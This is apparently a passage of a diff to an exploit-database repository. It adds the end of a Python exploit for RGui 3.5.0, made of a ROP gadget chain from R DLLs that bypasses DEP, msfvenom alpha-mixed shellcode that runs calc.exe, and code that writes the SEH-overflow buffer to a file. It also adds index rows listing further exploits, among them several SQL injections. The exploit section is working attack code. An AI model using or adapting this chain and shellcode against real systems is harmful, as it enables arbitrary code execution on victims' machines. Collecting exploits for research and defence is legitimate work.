+      0x6c92e13a,  # ADD EAX,5B18C483 # RETN [R.dll] 
+      0x6c9f4bca,  # XCHG EAX,EDX # RETN [R.dll] 
+      0x713811b8,  # POP ECX # RETN [stats.dll] 
+      0xffffffc0,  # Value to negate, will become 0x00000040
+      0x7136d670,  # NEG ECX # RETN [stats.dll] 
+      0x6cb2601a,  # POP EDI # RETN [R.dll] 
+      0x6375fe5c,  # RETN (ROP NOP) [Rgraphapp.dll]
+      0x63976123,  # POP EAX # RETN [graphics.dll] 
+      0x90909090,  # nop
+      0x6ff24de3,  # PUSHAD # RETN [grDevices.dll] 
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
+#Payload size: 448 bytes
+calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
+"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
+"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
+"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
+"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
+"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
+"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
+"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
+"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
+"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
+"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
+"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
+"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
+"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
+"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
+"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
+"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
+"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
+"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
+"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
+"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
+"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
+"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
+"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
+"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
+"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
+
+fill = "F"*6000
+
+buffer = junk + seh + nops + rop_chain + nops + calc + fill
+  
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()

files_exploits.csv

@@ -10195,6 +10195,7 @@ id,file,description,date,author,type,platform,port
 46093,exploits/windows/local/46093.txt,"KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation",2019-01-07,"Hashim Jawad",local,windows,
 46098,exploits/windows/local/46098.txt,"Microsoft Windows - Windows Error Reporting Local Privilege Escalation",2019-01-02,SandboxEscaper,local,windows,
 46104,exploits/windows/local/46104.txt,"Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion",2019-01-09,"Google Security Research",local,windows,
+46107,exploits/windows/local/46107.py,"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-10,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40589,3 +40590,14 @@ id,file,description,date,author,type,platform,port
 46100,exploits/hardware/webapps/46100.txt,"Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin)",2019-01-09,SajjadBnd,webapps,hardware,
 46102,exploits/hardware/webapps/46102.txt,"ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting",2019-01-09,"Nathu Nandwani",webapps,hardware,80
 46106,exploits/windows/webapps/46106.txt,"BlogEngine 3.3 - XML External Entity Injection",2019-01-09,Netsparker,webapps,windows,
+46108,exploits/php/webapps/46108.txt,"PEAR Archive_Tar < 1.4.4 - PHP Object Injection",2019-01-10,"Fariskhi Vidyan",webapps,php,
+46109,exploits/php/webapps/46109.py,"eBrigade ERP 4.5 - Arbitrary File Download",2019-01-10,AkkuS,webapps,php,80
+46110,exploits/php/webapps/46110.txt,"Matrix MLM Script 1.0 - Information Disclosure",2019-01-10,"Ihsan Sencan",webapps,php,80
+46111,exploits/php/webapps/46111.txt,"doitX 1.0 - 'search' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
+46112,exploits/php/webapps/46112.txt,"Shield CMS 2.2 - 'email' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
+46113,exploits/php/webapps/46113.txt,"Architectural 1.0 - 'email' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
+46114,exploits/php/webapps/46114.txt,"MLMPro 1.0 - SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
+46115,exploits/php/webapps/46115.txt,"Event Calendar 3.7.4 - 'id' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
+46116,exploits/php/webapps/46116.txt,"Event Locations 1.0.1 - 'id' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
+46117,exploits/php/webapps/46117.txt,"eBrigade ERP 4.5 - SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
+46118,exploits/multiple/webapps/46118.txt,"OpenSource ERP 6.3.1. - SQL Injection",2019-01-10,"Emre ÖVÜNÇ",webapps,multiple,80